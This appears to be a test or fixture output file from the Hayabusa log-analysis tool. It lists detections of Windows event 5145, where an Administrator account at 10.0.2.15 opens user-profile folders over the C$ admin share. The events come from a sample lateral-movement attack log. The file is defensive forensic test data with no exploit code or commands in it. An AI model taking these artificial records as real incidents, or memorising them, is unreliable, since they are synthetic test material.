+2019-03-18 23:23:23.576 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\account$\Searches\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.576 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\account$\Videos\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.576 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\account$\Contacts  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\account$\Desktop  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\account$\Documents  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\account$\Downloads  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\account$\Favorites  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\account$\Favorites\Links\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\account$\Favorites\Links for United States\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\account$\Favorites\Links  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\account$\Favorites\Links for United States  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\account$\Links  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\account$\Music  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\account$\Pictures  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\account$\Saved Games  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\account$\Searches  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\account$\Videos  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admin01  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admin01\Contacts\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admin01\Desktop\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admin01\Documents\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admin01\Downloads\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admin01\Favorites\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admin01\Links\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.626 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admin01\Music\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.626 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admin01\Pictures\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.626 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admin01\Saved Games\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admin01\Searches\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admin01\Videos\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admin01\Contacts  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admin01\Desktop  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admin01\Documents  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.666 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admin01\Downloads  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.666 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admin01\Favorites  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.666 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admin01\Favorites\Links\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.666 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admin01\Favorites\Links for United States\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admin01\Favorites\Links  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admin01\Favorites\Links for United States  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admin01\Links  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admin01\Music  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admin01\Pictures  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admin01\Saved Games  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admin01\Searches  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admin01\Videos  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator\Contacts\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator\Desktop\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator\Documents\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.696 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator\Downloads\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.696 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator\Favorites\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.696 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator\Links\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.696 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator\Music\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator\Pictures\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator\Saved Games\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator\Searches\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator\Videos\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator\Contacts  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator\Desktop  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator\Documents  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator\Downloads  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator\Favorites  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator\Favorites\Links\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator\Favorites\Links for United States\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator\Favorites\Links  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator\Favorites\Links for United States  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator\Links  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator\Music  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator\Pictures  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator\Saved Games  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator\Searches  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator\Videos  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
